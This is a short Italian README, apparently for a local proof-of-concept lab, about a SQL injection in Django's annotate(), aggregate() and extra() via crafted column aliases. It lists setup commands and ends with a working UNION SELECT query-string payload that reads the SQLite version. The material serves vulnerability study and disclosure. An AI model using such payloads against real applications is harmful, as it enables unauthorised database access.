
È stato scoperto un problema in Django 2.2 prima di 2.2.28, 3.2 prima di 3.2.13 e 4.0 prima di 4.0.4. I metodi QuerySet.annotate(), aggregate() e extra() sono soggetti a injection SQL negli alias delle colonne tramite un dizionario costruito ad arte (con espansione del dizionario) passato come **kwargs.
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --
